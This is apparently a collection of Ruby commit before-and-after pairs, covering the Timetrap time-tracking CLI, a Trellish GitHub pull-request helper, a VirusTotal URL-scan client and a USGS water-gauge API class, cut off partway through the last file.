# -z appends to the existing note using the configured delimiter.
if args['-z']
note = [entry.note, note].join(Config['append_notes_delimiter'])
end
entry.update :note => note
end
puts format_entries(entry)
end
# Replace this process with an interactive sqlite3 shell on the timetrap
# database. Passing the path as a separate argv element (instead of a
# single shell string) keeps paths with spaces or shell metacharacters
# from being mangled by shell interpolation.
def backend
  exec "sqlite3", DB_NAME
end
# Check in to the current sheet, optionally at a given time (-a). With
# auto_checkout configured, all running entries are stopped first; with
# require_note, a note is prompted for when none was supplied.
def in
if Config['auto_checkout']
Timer.stop_all(args['-a']).each do |checked_out_of|
warn "Checked out of sheet #{checked_out_of.sheet.inspect}."
end
end
if Config['require_note'] && !Timer.running? && unused_args.empty?
$stderr.print("Please enter a note for this entry:\n> ")
self.unused_args = $stdin.gets
end
Timer.start unused_args, args['-a']
warn "Checked into sheet #{Timer.current_sheet.inspect}."
end
# Check in again with the same note as the sheet's most recent entry,
# falling back to the archived "_<sheet>" copy, then to any note passed on
# the command line.
def resume
  last_entry = Timer.entries(Timer.current_sheet).last
  last_entry ||= Timer.entries("_#{Timer.current_sheet}").last
  # Message fix: previously read "No entry yet on this sheet yet."
  warn "No entry on this sheet yet. Started a new entry." unless last_entry
  note = (last_entry ? last_entry.note : nil)
  warn "Resuming #{note.inspect} from entry ##{last_entry.id}" if note
  self.unused_args = note || unused_args
  self.in
end
# Check out, optionally at a given time (-a). With auto_checkout every
# running entry is stopped; otherwise only the named (or current) sheet's
# running entry is stopped.
def out
if Config['auto_checkout']
stopped = Timer.stop_all(args['-a']).each do |checked_out_of|
warn "Checked out of sheet #{checked_out_of.sheet.inspect}."
end
if stopped.empty?
warn "No running entries to stop."
end
else
sheet = sheet_name_from_string(unused_args)
if Timer.stop sheet, args['-a']
warn "Checked out of sheet #{sheet.inspect}."
else
warn "No running entry on sheet #{sheet.inspect}."
end
end
end
# Delete a single entry (-i ID) or a whole sheet (by name), after asking
# for confirmation.
def kill
if e = Entry[args['-i']]
out = "are you sure you want to delete entry #{e.id}? "
out << "(#{e.note}) " if e.note.to_s =~ /.+/
if ask_user out
e.destroy
warn "it's dead"
else
warn "will not kill"
end
# `sheets` and `sheet` are assigned inside this condition, so both are
# also available in the else branch below.
elsif (sheets = Entry.map{|e| e.sheet }.uniq).include?(sheet = unused_args)
victims = Entry.filter(:sheet => sheet).count
if ask_user "are you sure you want to delete #{victims} entries on sheet #{sheet.inspect}? "
Entry.filter(:sheet => sheet).destroy
warn "killed #{victims} entries"
else
warn "will not kill"
end
else
victim = args['-i'] ? args['-i'].to_s.inspect : sheet.inspect
warn ["can't find #{victim} to kill", 'sheets:', *sheets].join("\n")
end
end
# Print the currently selected entries, oldest first, rendered with the
# configured formatter.
def display
  selected = selected_entries.order(:start).all
  if selected.empty?
    warn "No entries were selected to display."
  else
    puts format_entries(selected)
  end
end
# Switch to the named sheet (created implicitly on first use), or list all
# sheets when no name is given. The special name '-' switches back to the
# previously active sheet.
def sheet
sheet = unused_args
case sheet
when nil, ''
list
return
when '-'
if Timer.last_sheet
sheet = Timer.last_sheet
else
warn 'LAST_SHEET is not set'
return
end
end
Timer.current_sheet = sheet
warn "Switching to sheet #{sheet.inspect}"
end
# Print a table of all sheets with their running/today/total durations.
# The current sheet is marked '*', the previously active one '-'.
def list
sheets = ([Timer.current_sheet] | Entry.sheets).map do |sheet|
sheet_atts = {:total => 0, :running => 0, :today => 0}
entries = Timetrap::Entry.filter(:sheet => sheet)
if entries.empty?
sheet_atts.merge(:name => sheet)
else
# Accumulate seconds per bucket; running entries count up to "now".
entries.inject(sheet_atts) do |m, e|
e_end = e.end_or_now
m[:name] ||= sheet
m[:total] += (e_end.to_i - e.start.to_i)
m[:running] += (e_end.to_i - e.start.to_i) unless e.end
m[:today] += (e_end.to_i - e.start.to_i) if same_day?(Time.now, e.start)
m
end
end
end.sort_by{|sheet| sheet[:name].downcase}
# First column width tracks the longest sheet name, with a floor of 10.
width = sheets.sort_by{|h|h[:name].length }.last[:name].length + 4
width = 10 if width < 10
puts " %-#{width}s%-12s%-12s%s" % ["Timesheet", "Running", "Today", "Total Time"]
sheets.each do |sheet|
star = sheet[:name] == Timer.current_sheet ? '*' : sheet[:name] == Timer.last_sheet ? '-' : ' '
puts "#{star}%-#{width}s%-12s%-12s%s" % [
sheet[:running],
sheet[:today],
sheet[:total]
].map(&method(:format_seconds)).unshift(sheet[:name])
end
end
# Show every running entry with its elapsed time. The entry on the current
# sheet is marked '*'.
def now
if !Timer.running?
warn "*#{Timer.current_sheet}: not running"
end
Timer.running_entries.each do |entry|
current = entry.sheet == Timer.current_sheet
out = current ? '*' : ' '
out << "#{entry.sheet}: #{format_duration(entry.duration)}".gsub(/ /, ' ')
out << " (#{entry.note})" if entry.note =~ /.+/
puts out
end
end
# Shortcut for display with the start date pinned to the current day.
def today
args['-s'] = Date.today.to_s
display
end
# Shortcut for display with start and end dates pinned to yesterday.
def yesterday
  # Date arithmetic (Date - 1) works on Ruby 1.8 as well (Date#prev_day is
  # 1.9+), and computing the day once keeps -s and -e consistent.
  day = (Date.today - 1).to_s
  args['-s'] = day
  args['-e'] = day
  display
end
# Shortcut for display starting from Monday of the current week (today if
# it is already Monday; otherwise Chronic resolves "last monday").
def week
args['-s'] = Date.today.wday == 1 ? Date.today.to_s : Date.parse(Chronic.parse(%q(last monday)).to_s).to_s
display
end
# Shortcut for display over a whole calendar month. With -s, Chronic
# parses the requested month; otherwise the current month is used.
def month
# Chronic.parse expects a string, so stringify the Date default.
d = Chronic.parse( args['-s'] || Date.today.to_s )
args['-s'] = Date.new( d.year, d.month ).to_s
# Day -1 is the last day of the month; this also covers the
# December -> January rollover without a special case.
args['-e'] = Date.new( d.year, d.month, -1 ).to_s
display
end
private
# Positional (non-flag) arguments joined into a single string.
def unused_args
args.unused.join(' ')
end
# Replace the positional arguments from a whitespace-separated string.
def unused_args=(str)
args.unused = str.split
end
# Prompt on stderr and return truthy for a y/ye/yes answer;
# the -y flag skips the prompt and answers yes.
def ask_user question
return true if args['-y']
$stderr.print question
$stdin.gets =~ /\Aye?s?\Z/i
end
# Render entries with the formatter named by -f or the configured default.
def format_entries(entries)
load_formatter(args['-f'] || Config['default_formatter']).new(Array(entries)).output
end
end
end
Ruby 1.8 compatibility for yesterday command
module Timetrap
module CLI
extend Helpers
attr_accessor :args
extend self
USAGE = <<-EOF
Timetrap - Simple Time Tracking
Usage: #{File.basename $0} COMMAND [OPTIONS] [ARGS...]
COMMAND can be abbreviated. For example `t in` and `t i` are equivalent.
COMMAND is one of:
* archive - Move entries to a hidden sheet (by default named '_[SHEET]') so
they're out of the way.
usage: t archive [--start DATE] [--end DATE] [SHEET]
-s, --start <date:qs> Include entries that start on this date or later
-e, --end <date:qs> Include entries that start on this date or earlier
* backend - Open an sqlite shell to the database.
usage: t backend
* configure - Write out a YAML config file. Print path to config file. The
file may contain ERB.
usage: t configure
Currently supported options are:
round_in_seconds: The duration of time to use for rounding with
the -r flag
database_file: The file path of the sqlite database
append_notes_delimiter: delimiter used when appending notes via
t edit --append
formatter_search_paths: an array of directories to search for user
defined fomatter classes
default_formatter: The format to use when display is invoked without a
`--format` option
default_command: The default command to run when calling t.
auto_checkout: Automatically check out of running entries when
you check in or out
require_note: Prompt for a note if one isn't provided when
checking in
* display - Display the current timesheet or a specific. Pass `all' as SHEET
to display all unarchived sheets or `full' to display archived and
unarchived sheets.
usage: t display [--ids] [--start DATE] [--end DATE] [--format FMT] [SHEET | all | full]
-v, --ids Print database ids (for use with edit)
-s, --start <date:qs> Include entries that start on this date or later
-e, --end <date:qs> Include entries that start on this date or earlier
-f, --format <format> The output format. Valid built-in formats are
ical, csv, json, ids, factor, and text (default).
Documentation on defining custom formats can be
found in the README included in this
distribution.
* edit - Alter an entry's note, start, or end time. Defaults to the active
entry. Defaults to the last entry to be checked out of if no entry is active.
usage: t edit [--id ID] [--start TIME] [--end TIME] [--append] [NOTES]
-i, --id <id:i> Alter entry with id <id> instead of the running entry
-s, --start <time:qs> Change the start time to <time>
-e, --end <time:qs> Change the end time to <time>
-z, --append Append to the current note instead of replacing it
the delimiter between appended notes is
configurable (see configure)
-m, --move <sheet> Move to another sheet
* in - Start the timer for the current timesheet.
usage: t in [--at TIME] [NOTES]
-a, --at <time:qs> Use this time instead of now
* kill - Delete a timesheet or an entry.
usage: t kill [--id ID] [TIMESHEET]
-i, --id <id:i> Alter entry with id <id> instead of the running entry
* list - Show the available timesheets.
usage: t list
* now - Show all running entries.
usage: t now
* out - Stop the timer for a timesheet.
usage: t out [--at TIME] [TIMESHEET]
-a, --at <time:qs> Use this time instead of now
* resume - Start the timer for the current time sheet with the same note as
the last entry on the sheet. If there is no entry it takes the passed note.
usage: t resume [--at TIME] [NOTES]
-a, --at <time:qs> Use this time instead of now
* sheet - Switch to a timesheet creating it if necessary. When no sheet is
specified list all sheets. The special sheetname '-' will switch to the
last active sheet.
usage: t sheet [TIMESHEET]
* today - Shortcut for display with start date as the current day
usage: t today [--ids] [--format FMT] [SHEET | all]
* yesterday - Shortcut for display with start and end dates as the day before the current day
usage: t yesterday [--ids] [--format FMT] [SHEET | all]
* week - Shortcut for display with start date set to monday of this week.
usage: t week [--ids] [--end DATE] [--format FMT] [SHEET | all]
* month - Shortcut for display with start date set to the beginning of either
this month or a specified month.
usage: t month [--ids] [--start MONTH] [--format FMT] [SHEET | all]
OTHER OPTIONS
-h, --help Display this help.
-r, --round Round output to 15 minute start and end times.
-y, --yes Noninteractive, assume yes as answer to all prompts.
--debug Display stack traces for errors.
EXAMPLES
# create the "MyTimesheet" timesheet
$ t sheet MyTimesheet
# check in 5 minutes ago with a note
$ t in --at '5 minutes ago' doing some stuff
# check out
$ t out
# view current timesheet
$ t display
Submit bugs and feature requests to http://github.com/samg/timetrap/issues
EOF
def parse arguments
args.parse arguments
end
def invoke
args['-h'] ? puts(USAGE) : invoke_command_if_valid
rescue StandardError, LoadError => e
raise e if args['--debug']
warn e.message
exit 1 unless defined? TEST_MODE
end
def commands
Timetrap::CLI::USAGE.scan(/\* \w+/).map{|s| s.gsub(/\* /, '')}
end
def deprecated_commands
{
'switch' => 'sheet',
'running' => 'now',
'format' => 'display'
}
end
def invoke_command_if_valid
if args.unused.empty? && Timetrap::Config['default_command']
self.args = Getopt::Declare.new(USAGE.dup, Timetrap::Config['default_command'])
end
command = args.unused.shift
set_global_options
case (valid = commands.select{|name| name =~ %r|^#{command}|}).size
when 1 then send valid[0]
else
handle_invalid_command(command)
end
end
# True when +command+ exactly matches a known command name.
def valid_command(command)
commands.include?(command)
end
def handle_invalid_command(command)
if !command
puts USAGE
elsif mapping = deprecated_commands.detect{|(k,v)| k =~ %r|^#{command}|}
deprecated, current = *mapping
warn "The #{deprecated.inspect} command is deprecated in favor of #{current.inspect}. Sorry for the inconvenience."
send current
else
warn "Invalid command: #{command.inspect}"
end
end
# currently just sets whether output should be rounded to 15 min intervals
def set_global_options
Timetrap::Entry.round = true if args['-r']
end
def archive
ee = selected_entries
if ask_user "Archive #{ee.count} entries? "
ee.all.each do |e|
next unless e.end
e.update :sheet => "_#{e.sheet}"
end
else
warn "archive aborted!"
end
end
def configure
Config.configure!
puts "Config file is at #{Config::PATH.inspect}"
end
def edit
entry = case
when args['-i']
warn "Editing entry with id #{args['-i'].inspect}"
Entry[args['-i']]
when Timer.active_entry
warn "Editing running entry"
Timer.active_entry
when Timer.last_checkout
warn "Editing last entry you checked out of"
Timer.last_checkout
end
unless entry
warn "Can't find entry"
return
end
warn ""
entry.update :start => args['-s'] if args['-s'] =~ /.+/
entry.update :end => args['-e'] if args['-e'] =~ /.+/
# update sheet
if args['-m'] =~ /.+/
if entry == Timer.active_entry
Timer.current_sheet = args['-m']
end
entry.update :sheet => args['-m']
end
# update notes
if unused_args =~ /.+/
note = unused_args
if args['-z']
note = [entry.note, note].join(Config['append_notes_delimiter'])
end
entry.update :note => note
end
puts format_entries(entry)
end
def backend
exec "sqlite3 #{DB_NAME}"
end
def in
if Config['auto_checkout']
Timer.stop_all(args['-a']).each do |checked_out_of|
warn "Checked out of sheet #{checked_out_of.sheet.inspect}."
end
end
if Config['require_note'] && !Timer.running? && unused_args.empty?
$stderr.print("Please enter a note for this entry:\n> ")
self.unused_args = $stdin.gets
end
Timer.start unused_args, args['-a']
warn "Checked into sheet #{Timer.current_sheet.inspect}."
end
# Check in again, reusing the note of this sheet's most recent entry
# (falls back to the archived "_sheet", then to any note passed on the
# command line).
def resume
last_entry = Timer.entries(Timer.current_sheet).last
last_entry ||= Timer.entries("_#{Timer.current_sheet}").last
# Fixed duplicated word in the user-facing warning ("yet ... yet").
warn "No entry on this sheet yet. Started a new entry." unless last_entry
note = (last_entry ? last_entry.note : nil)
warn "Resuming #{note.inspect} from entry ##{last_entry.id}" if note
self.unused_args = note || unused_args
self.in
end
def out
if Config['auto_checkout']
stopped = Timer.stop_all(args['-a']).each do |checked_out_of|
warn "Checked out of sheet #{checked_out_of.sheet.inspect}."
end
if stopped.empty?
warn "No running entries to stop."
end
else
sheet = sheet_name_from_string(unused_args)
if Timer.stop sheet, args['-a']
warn "Checked out of sheet #{sheet.inspect}."
else
warn "No running entry on sheet #{sheet.inspect}."
end
end
end
def kill
if e = Entry[args['-i']]
out = "are you sure you want to delete entry #{e.id}? "
out << "(#{e.note}) " if e.note.to_s =~ /.+/
if ask_user out
e.destroy
warn "it's dead"
else
warn "will not kill"
end
elsif (sheets = Entry.map{|e| e.sheet }.uniq).include?(sheet = unused_args)
victims = Entry.filter(:sheet => sheet).count
if ask_user "are you sure you want to delete #{victims} entries on sheet #{sheet.inspect}? "
Entry.filter(:sheet => sheet).destroy
warn "killed #{victims} entries"
else
warn "will not kill"
end
else
victim = args['-i'] ? args['-i'].to_s.inspect : sheet.inspect
warn ["can't find #{victim} to kill", 'sheets:', *sheets].join("\n")
end
end
def display
entries = selected_entries.order(:start).all
if entries == []
warn "No entries were selected to display."
else
puts format_entries(entries)
end
end
def sheet
sheet = unused_args
case sheet
when nil, ''
list
return
when '-'
if Timer.last_sheet
sheet = Timer.last_sheet
else
warn 'LAST_SHEET is not set'
return
end
end
Timer.current_sheet = sheet
warn "Switching to sheet #{sheet.inspect}"
end
def list
sheets = ([Timer.current_sheet] | Entry.sheets).map do |sheet|
sheet_atts = {:total => 0, :running => 0, :today => 0}
entries = Timetrap::Entry.filter(:sheet => sheet)
if entries.empty?
sheet_atts.merge(:name => sheet)
else
entries.inject(sheet_atts) do |m, e|
e_end = e.end_or_now
m[:name] ||= sheet
m[:total] += (e_end.to_i - e.start.to_i)
m[:running] += (e_end.to_i - e.start.to_i) unless e.end
m[:today] += (e_end.to_i - e.start.to_i) if same_day?(Time.now, e.start)
m
end
end
end.sort_by{|sheet| sheet[:name].downcase}
width = sheets.sort_by{|h|h[:name].length }.last[:name].length + 4
width = 10 if width < 10
puts " %-#{width}s%-12s%-12s%s" % ["Timesheet", "Running", "Today", "Total Time"]
sheets.each do |sheet|
star = sheet[:name] == Timer.current_sheet ? '*' : sheet[:name] == Timer.last_sheet ? '-' : ' '
puts "#{star}%-#{width}s%-12s%-12s%s" % [
sheet[:running],
sheet[:today],
sheet[:total]
].map(&method(:format_seconds)).unshift(sheet[:name])
end
end
def now
if !Timer.running?
warn "*#{Timer.current_sheet}: not running"
end
Timer.running_entries.each do |entry|
current = entry.sheet == Timer.current_sheet
out = current ? '*' : ' '
out << "#{entry.sheet}: #{format_duration(entry.duration)}".gsub(/ /, ' ')
out << " (#{entry.note})" if entry.note =~ /.+/
puts out
end
end
def today
args['-s'] = Date.today.to_s
display
end
def yesterday
yesterday = (Date.today - 1).to_s
args['-s'] = yesterday
args['-e'] = yesterday
display
end
def week
args['-s'] = Date.today.wday == 1 ? Date.today.to_s : Date.parse(Chronic.parse(%q(last monday)).to_s).to_s
display
end
def month
d = Chronic.parse( args['-s'] || Date.today )
beginning_of_month = Date.new( d.year, d.month )
end_of_month = if d.month == 12 # handle edgecase
Date.new( d.year + 1, 1) - 1
else
Date.new( d.year, d.month+1 ) - 1
end
args['-s'] = beginning_of_month.to_s
args['-e'] = end_of_month.to_s
display
end
private
def unused_args
args.unused.join(' ')
end
def unused_args=(str)
args.unused = str.split
end
def ask_user question
return true if args['-y']
$stderr.print question
$stdin.gets =~ /\Aye?s?\Z/i
end
def format_entries(entries)
load_formatter(args['-f'] || Config['default_formatter']).new(Array(entries)).output
end
end
end
|
require 'faraday'
module Trellish
  # Git/GitHub helpers mixed into Trellish commands.
  module Git
    # Current branch name, parsed from .git/HEAD.
    # The file is HEAD (upper case) — the previous `cat .git/head` only
    # worked on case-insensitive filesystems; read the file directly
    # instead of shelling out.
    def current_git_branch
      @current_git_branch ||= ::File.read('.git/HEAD').split('/').last.strip
    end

    # Open a pull request on GitHub for the current branch and memoize its
    # html_url. Requires :github_oauth_token and :git_base_branch in
    # Trellish.config, and @card to be set by the including command.
    def github_pull_request_url
      return @github_pull_request_url if @github_pull_request_url
      conn = Faraday.new(:url => 'https://api.github.com', :ssl => {:ca_file => '/System/Library/OpenSSL/certs/ca-certificates.crt'}) do |faraday|
        faraday.request :url_encoded
        faraday.adapter ::Faraday.default_adapter
      end
      begin
        response = conn.post do |req|
          req.url "/repos/#{git_repository_owner}/#{git_repository_name}/pulls"
          req.headers['Content-Type'] = 'application/json'
          req.headers['Authorization'] = "token #{Trellish.config[:github_oauth_token]}"
          req.body = {
            title: @card.name,
            base: Trellish.config[:git_base_branch],
            head: "#{git_repository_owner}:#{current_git_branch}"
          }.to_json
        end
      rescue Faraday::Error::ConnectionFailed => e
        Trellish.logger.error "Failed to connect to Github. Please check your github_oauth_token parameter in trellish.yml, or regenerate it if you continue to have problems. Original error: #{e.message}"
        exit
      end
      @github_pull_request_url = JSON.parse(response.body)["html_url"]
    end

    # Repository name ("bar" in git@github.com:foo/bar.git).
    def git_repository_name
      @git_repository_name ||= matches[2]
    end

    # Repository owner ("foo" in git@github.com:foo/bar.git).
    def git_repository_owner
      @git_repository_owner ||= matches[1]
    end

    # MatchData for an SSH-style GitHub remote (nil for anything else).
    # The dot in "github.com" is now escaped so lookalike hosts can't
    # match; the redundant `matches =` local assignment was removed.
    def matches
      @matches ||= remote_url.match(%r|^git@github\.com:([^/]*)\/([^\.]*)\.git$|)
    end

    def remote_url
      @remote_url ||= `git config remote.origin.url`
    end
  end
end
More helpful github api error messages
require 'faraday'
module Trellish
  # Git/GitHub helpers mixed into Trellish commands.
  module Git
    # Current branch name, parsed from .git/HEAD.
    # The file is HEAD (upper case) — the previous `cat .git/head` only
    # worked on case-insensitive filesystems; read the file directly
    # instead of shelling out.
    def current_git_branch
      @current_git_branch ||= ::File.read('.git/HEAD').split('/').last.strip
    end

    # Open a pull request on GitHub for the current branch and memoize its
    # html_url. Requires :github_oauth_token and :git_base_branch in
    # Trellish.config, and @card to be set by the including command.
    # Exits with a log message on connection failure or bad credentials.
    def github_pull_request_url
      return @github_pull_request_url if @github_pull_request_url
      conn = Faraday.new(:url => 'https://api.github.com', :ssl => {:ca_file => '/System/Library/OpenSSL/certs/ca-certificates.crt'}) do |faraday|
        faraday.request :url_encoded
        faraday.adapter ::Faraday.default_adapter
      end
      begin
        response = conn.post do |req|
          req.url "/repos/#{git_repository_owner}/#{git_repository_name}/pulls"
          req.headers['Content-Type'] = 'application/json'
          req.headers['Authorization'] = "token #{Trellish.config[:github_oauth_token]}"
          req.body = {
            title: @card.name,
            base: Trellish.config[:git_base_branch],
            head: "#{git_repository_owner}:#{current_git_branch}"
          }.to_json
        end
      rescue Faraday::Error::ConnectionFailed => e
        Trellish.logger.error "Failed to connect to Github. Please check your github_oauth_token parameter in trellish.yml, or regenerate it if you continue to have problems. Original error: #{e.message}"
        exit
      end
      if response.status == 401
        Trellish.logger.error "The response from the Github API says Bad Credentials. Please check your github_oauth_token parameter in trellish."
        exit
      end
      @github_pull_request_url = JSON.parse(response.body)["html_url"]
    end

    # Repository name ("bar" in git@github.com:foo/bar.git).
    def git_repository_name
      @git_repository_name ||= matches[2]
    end

    # Repository owner ("foo" in git@github.com:foo/bar.git).
    def git_repository_owner
      @git_repository_owner ||= matches[1]
    end

    # MatchData for an SSH-style GitHub remote (nil for anything else).
    # The dot in "github.com" is now escaped so lookalike hosts can't
    # match; the redundant `matches =` local assignment was removed.
    def matches
      @matches ||= remote_url.match(%r|^git@github\.com:([^/]*)\/([^\.]*)\.git$|)
    end

    def remote_url
      @remote_url ||= `git config remote.origin.url`
    end
  end
end
|
# Copyright (c) 2012-2013 Arxopia LLC.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of the project's author nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
module Uirusu
  # Wrapper for the Virustotal.com V2 URL scan/report endpoints.
  module VTUrl
    SCAN_URL   = "https://www.virustotal.com/vtapi/v2/url/scan"
    # Now HTTPS like SCAN_URL — the API key travels in the request body
    # and must not be sent over plaintext.
    REPORT_URL = "https://www.virustotal.com/vtapi/v2/url/report"

    # Submits a URL to be scanned by Virustotal.com
    #
    # @param api_key Virustotal.com API key
    # @param resource url to submit
    #
    # @return [JSON] Parsed response
    def self.scan_url(api_key, resource)
      post_and_parse(SCAN_URL, api_key, :url => resource)
    end

    # Searches reports by URL from Virustotal.com
    #
    # @param api_key Virustotal.com API key
    # @param resource url to search
    #
    # @return [JSON] Parsed response
    def self.query_report(api_key, resource)
      post_and_parse(REPORT_URL, api_key, :resource => resource)
    end

    # Shared validation, POST and response handling for both endpoints.
    # NOTE(review): RestClient normally raises on non-2xx responses before
    # the case is reached; the 429/403 arms are kept for parity with the
    # original behavior — confirm against the rest-client version in use.
    def self.post_and_parse(endpoint, api_key, params)
      raise "Invalid API Key" if api_key == nil
      raise "Invalid resource, must be a valid url" if params.values.first == nil
      response = RestClient.post endpoint, { :apikey => api_key }.merge(params)
      case response.code
      when 429
        raise "Virustotal limit reached. Try again later."
      when 403
        raise "Invalid privileges, please check your API key."
      when 200
        JSON.parse(response)
      else
        raise "Unknown Server error."
      end
    end
    private_class_method :post_and_parse
  end
end
Modified API URI constants to use Uirusu::VT_API
# Copyright (c) 2012-2013 Arxopia LLC.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of the project's author nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
module Uirusu
  # Wrapper for the Virustotal.com V2 URL scan/report endpoints,
  # rooted at the project-wide Uirusu::VT_API base URI.
  module VTUrl
    SCAN_URL   = Uirusu::VT_API + "/url/scan"
    REPORT_URL = Uirusu::VT_API + "/url/report"

    # Submits a URL to be scanned by Virustotal.com
    #
    # @param api_key Virustotal.com API key
    # @param resource url to submit
    #
    # @return [JSON] Parsed response
    def self.scan_url(api_key, resource)
      post_and_parse(SCAN_URL, api_key, :url => resource)
    end

    # Searches reports by URL from Virustotal.com
    #
    # @param api_key Virustotal.com API key
    # @param resource url to search
    #
    # @return [JSON] Parsed response
    def self.query_report(api_key, resource)
      post_and_parse(REPORT_URL, api_key, :resource => resource)
    end

    # Shared validation, POST and response handling for both endpoints.
    # NOTE(review): RestClient normally raises on non-2xx responses before
    # the case is reached; the 429/403 arms are kept for parity with the
    # original behavior — confirm against the rest-client version in use.
    def self.post_and_parse(endpoint, api_key, params)
      raise "Invalid API Key" if api_key == nil
      raise "Invalid resource, must be a valid url" if params.values.first == nil
      response = RestClient.post endpoint, { :apikey => api_key }.merge(params)
      case response.code
      when 429
        raise "Virustotal limit reached. Try again later."
      when 403
        raise "Invalid privileges, please check your API key."
      when 200
        JSON.parse(response)
      else
        raise "Unknown Server error."
      end
    end
    private_class_method :post_and_parse
  end
end
|
module Usgs
  # Builds Gauge objects from the USGS Instantaneous Values web service.
  class Request
    # Fetch measurements for either a two-letter state code or a site id
    # (8+ characters), optionally restricted to a date range.
    #
    # Returns an array of Usgs::Gauge, or the {:status => "Invalid Request"}
    # hash untouched when the input matched neither form.
    def self.measurements_by(input, date_range = nil)
      response = make_api_request(input, date_range)
      return response if response[:status] == "Invalid Request"
      time_series = response["value"]["timeSeries"]
      # Accumulate by gauge id: the USGS API returns multiple timeSeries
      # objects (one per measured parameter) for the same gauge.
      streams = Hash.new
      time_series.each do |ts|
        site_id = ts["sourceInfo"]["siteCode"].first["value"]
        state_property = ts["sourceInfo"]["siteProperty"].find { |p| p["name"] == "stateCd" }
        state = state_lookup[state_property["value"]]
        values = ts["values"].first["value"]
        unit = ts["variable"]["unit"]["unitAbbreviation"]
        unless streams.key?(site_id)
          streams[site_id] = {
            :sitename => ts["sourceInfo"]["siteName"],
            :state => state,
            :geolocation => ts["sourceInfo"]["geoLocation"]["geogLocation"],
            :measurements => []
          }
        end
        values.each do |value|
          streams[site_id][:measurements] << {
            "dateTime" => value["dateTime"],
            "unit" => unit,
            "value" => value["value"]
          }
        end
      end
      # Convert the accumulated hash into one Gauge per site.
      streams.map do |gauge_id, data|
        Usgs::Gauge.new(
          gauge_id: gauge_id,
          site_name: data[:sitename],
          state: data[:state],
          geo_location: data[:geolocation],
          measurements: data[:measurements]
        )
      end
    end

    # Example request:
    # https://waterservices.usgs.gov/nwis/iv/?format=json&indent=on&sites=06614800&siteType=ST&siteStatus=active&parameterCd=00060
    # Length 2 selects by state code, 8+ by site id; anything else is an
    # invalid request. (Redundant .to_s calls inside interpolation removed.)
    def self.make_api_request(input, date_range = nil)
      base_url = "https://waterservices.usgs.gov/nwis/iv/?format=json"
      request_params =
        if input.length == 2
          "&stateCd=#{input}#{date_params(date_range)}"
        elsif input.length >= 8
          "&sites=#{input}#{date_params(date_range)}"
        else
          return { :status => "Invalid Request" }
        end
      response = Faraday.get(base_url + request_params)
      JSON.parse(response.body)
    end

    # "&startDT=...&endDT=..." for a date range, or "" when none given.
    def self.date_params(date_range)
      return "" unless date_range
      "&startDT=#{date_range.first}&endDT=#{date_range.last}"
    end

    # Two-digit FIPS code => USPS state abbreviation.
    def self.state_lookup
      {
        "01"=>"AL","02"=>"AK","04"=>"AZ","05"=>"AR","06"=>"CA","08"=>"CO",
        "09"=>"CT","10"=>"DE","11"=>"DC","12"=>"FL","13"=>"GA","15"=>"HI",
        "16"=>"ID","17"=>"IL","18"=>"IN","19"=>"IA","20"=>"KS","21"=>"KY",
        "22"=>"LA","23"=>"ME","24"=>"MD","25"=>"MA","26"=>"MI","27"=>"MN",
        "28"=>"MS","29"=>"MO","30"=>"MT","31"=>"NE","32"=>"NV","33"=>"NH",
        "34"=>"NJ","35"=>"NM","36"=>"NY","37"=>"NC","38"=>"ND","39"=>"OH",
        "40"=>"OK","41"=>"OR","42"=>"PA","44"=>"RI","45"=>"SC","46"=>"SD",
        "47"=>"TN","48"=>"TX","49"=>"UT","50"=>"VT","51"=>"VA","53"=>"WA",
        "54"=>"WV","55"=>"WI","56"=>"WY"
      }
    end

    # A bare `private` has no effect on singleton (def self.) methods,
    # so the helpers are made private explicitly.
    private_class_method :make_api_request, :date_params, :state_lookup
  end
end
Fixes unit
module Usgs
class Request
def self.measurements_by(input, date_range = nil)
response = make_api_request(input, date_range)
